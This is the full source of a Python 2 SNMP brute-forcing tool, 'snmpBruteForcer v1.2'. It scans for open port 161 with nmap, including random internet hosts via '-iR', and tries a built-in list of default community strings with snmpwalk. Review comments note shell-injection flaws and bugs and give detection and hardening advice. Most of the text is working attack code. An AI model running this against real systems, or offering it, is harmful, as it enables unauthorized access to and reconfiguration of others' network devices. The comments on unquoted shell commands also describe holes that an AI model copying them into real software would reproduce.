Gonzalez

SNMP Bruteforce

#!/usr/bin/python
#Uses nmap to check if snmp port is open then uses snmpwalk to try and bruteforce
#the community name.

#Required: nmap and snmpwalk

#Changelog: added iprange, single scans and threading for random scans
#Changelog: added the ability to add your own wordlist, it will add to
#the ones given and erase the duplicates

#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com

import time, StringIO, commands, sys, re, threading, sets

def timer():
    """Return the current local time as an ``asctime``-formatted string."""
    return time.asctime(time.localtime(time.time()))

def title():
    """Print the tool banner and the separator rule beneath it."""
    banner = (
        "\n\t d3hydr8[at]gmail[dot]com snmpBruteForcer v1.2",
        "\t--------------------------------------------------\n",
    )
    for line in banner:
        print line

def scan(option):
    """Run nmap against *option* for port 161 and return the addresses found.

    *option* is the nmap target specification (or target-selection flag).
    The nmap output is filtered through ``grep open -B 3`` and every
    dotted-quad-looking token in what remains is collected.

    Returns the list of matches, or None when nothing matched.  Exits the
    process with status 1 when the shell reports that nmap is missing.
    """
    # NOTE(review): option is spliced into a shell command line unquoted, so
    # any shell metacharacters it contains are interpreted by the shell.
    # -P0 disables nmap's host-discovery step, so every target is probed.
    command = 'nmap -P0 '+option+' -p 161 | grep open -B 3'
    output = commands.getstatusoutput(command)[1]

    if re.search("command not found", output.lower()):
        print "\n[-] nmap not installed!!!\n"
        sys.exit(1)

    # The pattern allows empty digit groups, so it is looser than a strict
    # IPv4 match; an empty result is reported to the caller as None.
    found = re.findall("\d*\.\d*\.\d*\.\d*", output)
    return found or None

def brute(ip):
    """Try every entry of the global ``names`` list as the community for *ip*.

    One ``snmpwalk`` process is started per candidate.  A reply of more
    than one line is reported as a success; nothing is returned.  Exits
    the process with status 1 when the shell reports snmpwalk is missing.

    Seen from the agent, a run is a burst of requests from one source that
    cycle through different, mostly wrong, community strings.  That is the
    pattern to alert on in agent logs or authenticationFailure traps.
    """
    print "\n[+] Attempting BruteForce:",ip
    try:
        for community in names:
            # NOTE(review): ip and the candidate are concatenated into a
            # shell command line without quoting.
            raw = commands.getstatusoutput('snmpwalk '+ip+" "+community)[1]
            reply = StringIO.StringIO(raw).readlines()

            # reply[0] is read unconditionally; empty output would raise
            # IndexError here.
            if re.search("command not found", reply[0].lower()):
                print "\n[-] snmpwalk not installed!!!\n"
                sys.exit(1)

            if verbose == 1:
                print "\t{- Trying:",community
            if len(reply) > 1:
                print "\n\tSuccess:",ip,"Community Name:",community
                print "\n\tTry: snmpwalk",ip,community,"\n"
    except (), msg:
        # The empty tuple matches no exception type, so this handler never
        # runs and any error raised above propagates to the caller.
        pass

class Worker(threading.Thread):
    """Thread that scans one nmap-chosen random address and tries any hits."""

    def run(self):
        """Scan with ``-iR 1`` and pass each address found to ``brute``."""
        # "-iR 1" makes nmap pick a single random target address itself, so
        # the probed host is not chosen by the operator.
        hits = scan("-iR 1")
        if hits is None:
            return
        for ip in hits:
            brute(ip)

# With fewer than two command-line arguments there is nothing to run:
# show the banner and the usage text, then exit with status 1.
if len(sys.argv) < 3:
    title()
    for line in (
        "Usage: ./snmp_random.py <option> \n",
        "Example: ./snmpbrute.py -iprange 192.168.1-100.1-255 -verbose\n",
        "[options]",
        " -s/single <ip>: Bruteforce single ip",
        " -i/-iprange <ip_range>: Scans ip range for snmp to brute force",
        " -r/-random <how many to scan>: Will scan random ip's for snmp to brute force",
        " -l/-list <wordlist file>: Add your own wordlist",
        " -v/-verbose : Verbose Mode\n",
    ):
        print line
    sys.exit(1)

#Add more community names here.
# These are vendor-default and commonly guessed SNMPv1/v2c community
# strings.  An agent that still answers to any of them ("public" and
# "private" are the usual factory defaults) can be read by anyone able to
# reach it, and reconfigured if the community is a write one.  Audit device
# configurations against this list, prefer SNMPv3 with authentication and
# privacy, and restrict port 161 to management hosts.
names = [
    "1234", "2read", "4changes", "CISCO", "IBM",
    "OrigEquipMfr", "SNMP", "SUN", "access", "admin",
    "agent", "all", "cisco", "community", "default",
    "enable", "field", "guest", "hello", "ibm",
    "manager", "mngt", "monitor", "netman", "network",
    "none", "openview", "pass", "password", "passwd",
    "private", "proxy", "public", "read", "read-only",
    "read-write", "root", "router", "secret", "security",
    "snmp", "snmpd", "solaris", "sun", "switch",
    "system", "tech", "test", "world", "write",
]

# Hand-rolled option parsing.  For a flag that takes a value, the value is
# the argument right after the *first* occurrence of that flag.  A flag
# given as the last argument therefore raises an uncaught IndexError.
# mode, wordlist and verbose are only bound when their flag is present;
# later code detects missing wordlist/verbose through NameError.
for arg in sys.argv[1:]:
    if arg.lower() in ("-s", "-single"):
        ipaddr = sys.argv[sys.argv[1:].index(arg)+2]
        mode = "Single IP"
    elif arg.lower() in ("-i", "-iprange"):
        iprange = sys.argv[sys.argv[1:].index(arg)+2]
        mode = "Ip-Range"
    elif arg.lower() in ("-r", "-random"):
        total = sys.argv[sys.argv[1:].index(arg)+2]
        mode = "Random"
    elif arg.lower() in ("-l", "-list"):
        wordlist = sys.argv[sys.argv[1:].index(arg)+2]
    elif arg.lower() in ("-v", "-verbose"):
        verbose = 1
title()

# Merge a user-supplied wordlist into the built-in names, dropping
# duplicates via a set (so the resulting order is not preserved).
# When -l was not given, `wordlist` is unbound and the NameError raised by
# the first statement is how that case is detected and skipped.
try:
    print "[+] Wordlist:",wordlist,"loading"
    words = open(wordlist, "r").readlines()
    print "[+] Loaded:",len(words),"names"
    names = list(sets.Set(words + names))
except IOError:
    print "Error: Check your wordlist path\n"
    sys.exit(1)
except NameError:
    pass

# Echo the run configuration.  `mode` is unbound if none of -s/-i/-r was
# given, in which case the next line raises an uncaught NameError.
print "[+] Mode:",mode
if mode == "Random":
    # The host count arrives as a string; reject anything that is not digits.
    if not total.isdigit():
        print "\n[!] How many ips to scan: must be a number\n"
        sys.exit(1)
    print "[+] Total:",total
if mode == "Ip-Range":
    print "[+] Range:",iprange

# `verbose` is only bound when -v was passed; the NameError path sets the
# default of 0 that brute() reads later.
try:
    if verbose == 1:
        print "[+] Verbose Mode On"
except NameError:
    verbose = 0
    print "[-] Verbose Mode Off"

print "[+] Names Loaded:",len(names)
print "[+] Started:",timer(),"\n"

# Dispatch on the selected mode.
if mode == "Random":
    # One Worker thread per requested host, started a second apart.  The
    # threads are never joined, so the "Done" line below can be printed
    # while workers are still running.
    for i in range(int(total)):
        print "[+] Scanning:",i+1,"of",total
        work = Worker()
        work.start()
        time.sleep(1)
elif mode == "Single IP":
    brute(ipaddr)
elif mode == "Ip-Range":
    print "[+] Scanning:",iprange
    ips = scan(iprange)
    if ips is None:
        print "\n[!] No SNMP Open"
    else:
        print "[+] Found:",len(ips)
        for ip in ips:
            brute(ip)

print "\n[-] Done -",timer(),"\n"
